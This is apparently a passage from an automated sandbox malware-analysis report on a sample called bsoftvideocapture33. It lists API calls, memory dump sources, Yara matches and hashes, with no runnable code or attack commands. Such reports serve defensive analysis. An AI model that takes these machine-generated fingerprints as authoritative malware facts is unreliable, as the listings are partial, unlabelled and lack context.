                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,004028E9), ref: 00402CCF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00402CDF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                        • Opcode ID: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                                                                        • Instruction ID: 2adebd830dd3b14d64e79f2d4f5eff8f6aaaa0a0dfbfbc424d90c26f206a1370
                                                                                                                                        • Opcode Fuzzy Hash: d54598a83eb0baa68b6903309d995a9c08ead6f1cb52c8cdd87b98e358e571e4
                                                                                                                                        • Instruction Fuzzy Hash: 8EC01220388602ABFE902BB14F0EB2A21082F00B82F14407E6589F02C0CEBCC008903D
                                                                                                                                        APIs
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403BAA), ref: 004047AD
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403BAA), ref: 004047D1
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403BAA), ref: 004047EB
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403BAA), ref: 004048AC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403BAA), ref: 004048C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual$FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 714016831-0
                                                                                                                                        • Opcode ID: cdae8ae5a690afa4d4f5a0e9c68b0154a05ea86f62aef1c42ef49f39af8a83b4
                                                                                                                                        • Instruction ID: 6e3f28a325fdea7f1120dddc177c98cba6358bc66e7b898124441de81bb44451
                                                                                                                                        • Opcode Fuzzy Hash: cdae8ae5a690afa4d4f5a0e9c68b0154a05ea86f62aef1c42ef49f39af8a83b4
                                                                                                                                        • Instruction Fuzzy Hash: 023104B65407019FD3309F24DD84B62B7E0EB88B54F10CA3AEA95B76D1D778A8448B5C
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustPointer_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1721217611-0
                                                                                                                                        • Opcode ID: 2c4dca0f6826aa15e7574a11dacd8b3f039dad988627f333ea5c1f2f26cc7d14
                                                                                                                                        • Instruction ID: c987ee2ed7adc3382d41aa35d9529b403a0ff6c889c2dd9a997f92aa2dad91b6
                                                                                                                                        • Opcode Fuzzy Hash: 2c4dca0f6826aa15e7574a11dacd8b3f039dad988627f333ea5c1f2f26cc7d14
                                                                                                                                        • Instruction Fuzzy Hash: 7C413A352043839FEB386F25D963B7633E5AF53724F14801DE851866D0EB71E680FA51
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C103CF
                                                                                                                                          • Part of subcall function 02C03FDC: __EH_prolog.LIBCMT ref: 02C03FE1
                                                                                                                                          • Part of subcall function 02C03FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02C03FF3
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02C103C4
                                                                                                                                        • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C10410
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C04149), ref: 02C104E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2825413587-0
                                                                                                                                        • Opcode ID: bc435e2dbdbb072cc056d905f3fc4630121998d3677d07125cea2cd5ffd80583
                                                                                                                                        • Instruction ID: 830760c846b7f1ad56a7ba8d3f4086fcf45c181a1d6f2954d45c3231f474629a
                                                                                                                                        • Opcode Fuzzy Hash: bc435e2dbdbb072cc056d905f3fc4630121998d3677d07125cea2cd5ffd80583
                                                                                                                                        • Instruction Fuzzy Hash: 9C51E2716043098BDB20DF28C88675A77E4BF8A328F594628FC6D97380DB35D985DB91
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C1E2EC
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 02C1E31A
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02C1E348
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02C1E37E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 5665ecec73e57f904d6d9d06adfb94626bd2d83c3de7d7924543fbd7f3a74e3b
                                                                                                                                        • Instruction ID: 6254f46e3dc4bd9ad44ae7b24cf1babf68b2aab3378db4bba1992a97a80c4d99
                                                                                                                                        • Opcode Fuzzy Hash: 5665ecec73e57f904d6d9d06adfb94626bd2d83c3de7d7924543fbd7f3a74e3b
                                                                                                                                        • Instruction Fuzzy Hash: 9631B030600256EFEB258E75C846BAE7BB6FF82314F554628EC68C7190E730DA51FB90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1648232842-0
                                                                                                                                        • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                                                        • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                                                                        • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                                                        • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                                                        • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3429445273-0
                                                                                                                                        • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                                                        • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                                                                        • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                                                        • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                                                                        APIs
                                                                                                                                        • htons.WS2_32(?), ref: 02C03DA2
                                                                                                                                          • Part of subcall function 02C03BD3: __EH_prolog.LIBCMT ref: 02C03BD8
                                                                                                                                          • Part of subcall function 02C03BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C03BED
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C03DB9
                                                                                                                                        • htonl.WS2_32(00000000), ref: 02C03DC0
                                                                                                                                        • htons.WS2_32(?), ref: 02C03DD4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3882411702-0
                                                                                                                                        • Opcode ID: 556cad7321ba2e00e1df2210b78f74a3f08f7e4ac314b5c1c38b144f334aac3d
                                                                                                                                        • Instruction ID: ec25663fd63ffc1309f8bdd48bc03ce8ca6892fcb9e7a05487206645686c777c
                                                                                                                                        • Opcode Fuzzy Hash: 556cad7321ba2e00e1df2210b78f74a3f08f7e4ac314b5c1c38b144f334aac3d
                                                                                                                                        • Instruction Fuzzy Hash: 5E11CE35A10358EFCF119F64D885AAAB7B9FF08310F018496FC04DF240EA719A18CBA1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1477753154-0
                                                                                                                                        • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                                                        • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                                                                        • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                                                        • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                                                                        APIs
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02C023D0
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C023DE
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C02401
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C02408
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4018804020-0
                                                                                                                                        • Opcode ID: 7b3126680318c07b459d56b2b6eb3220289d2389af39c708e3aebf48538cd398
                                                                                                                                        • Instruction ID: 00f5806e6d4208b13817b87c04bd1f8b64951e4781a0ccf899b1c5da3cc348e7
                                                                                                                                        • Opcode Fuzzy Hash: 7b3126680318c07b459d56b2b6eb3220289d2389af39c708e3aebf48538cd398
                                                                                                                                        • Instruction Fuzzy Hash: 6811CE72650304AFDB249F60D888B67BBB8FF44759F10446DEA019B180DBB1E955CBE1
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02EEE
                                                                                                                                        • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02EFD
                                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C02F0C
                                                                                                                                        • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C02F36
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$Socketsetsockopt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2093263913-0
                                                                                                                                        • Opcode ID: d21e220b9c3e32a9d3463864687e26ca2aeb4c2b77d94aa5a0981311bf92f856
                                                                                                                                        • Instruction ID: 91e0a7ba9de3d7346740aa619601b6335e152de585bdfc6876887d271d53a48d
                                                                                                                                        • Opcode Fuzzy Hash: d21e220b9c3e32a9d3463864687e26ca2aeb4c2b77d94aa5a0981311bf92f856
                                                                                                                                        • Instruction Fuzzy Hash: BF018871910314BBDB305F65DC88B5B7BA9DB857B1F018569FA18DB181DB7189008BA0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                        • Instruction ID: a34dc2c01341a1d51790be46c2c99bbffb75e72e1ac9c1b80d78d2c4981b7a5c
                                                                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                        • Instruction Fuzzy Hash: CA01283240114AFBCF126E95CC028AE3F22BF5A254B588415FA2899131C336C6B6FB81
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 02C195F4
                                                                                                                                          • Part of subcall function 02C19C0B: ___AdjustPointer.LIBCMT ref: 02C19C54
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 02C1960B
                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 02C1961D
                                                                                                                                        • CallCatchBlock.LIBCMT ref: 02C19641
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2633735394-0
                                                                                                                                        • Opcode ID: 713256ae837dbe65801958c0297b5b5fc49ecbb291bb0655e55bccd4794a1f23
                                                                                                                                        • Instruction ID: a2f6f8be9f8461ab89388fbb3ecafbad9802fc79cbe2422894d72ecc1027d457
                                                                                                                                        • Opcode Fuzzy Hash: 713256ae837dbe65801958c0297b5b5fc49ecbb291bb0655e55bccd4794a1f23
                                                                                                                                        • Instruction Fuzzy Hash: 12012532000149FBCF12AF95CC52EDA3BBAEF8A754F058015FA1862120C332E561FFA4
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                                                          • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                                                        • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2673540737-0
                                                                                                                                        • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                                                        • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                                                                        • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                                                        • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3526213481-0
                                                                                                                                        • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                                                        • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                                                                        • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                                                        • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                                                                        • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                                                                          • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                                                                        • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                                                                          • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 60969197
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2877408194-0
                                                                                                                                        • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                                                        • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                                                                        • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                                                        • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                                                                        APIs
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C024A9
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C024B8
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C024CD
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C024D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4018804020-0
                                                                                                                                        • Opcode ID: 1a9e037cc48d63fcf6f64441bae779a192bc17169be7f9a295ecf72f71cd9029
                                                                                                                                        • Instruction ID: 4cde89cdf3117fc07b097cb5e28471dd90e24d2eaa07c6a4dab1f12eb1b843f7
                                                                                                                                        • Opcode Fuzzy Hash: 1a9e037cc48d63fcf6f64441bae779a192bc17169be7f9a295ecf72f71cd9029
                                                                                                                                        • Instruction Fuzzy Hash: CDF01972540204AFDB04AFA5EC88F9ABBACFF48751F404519FA04C6141DB71E5648FE0
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
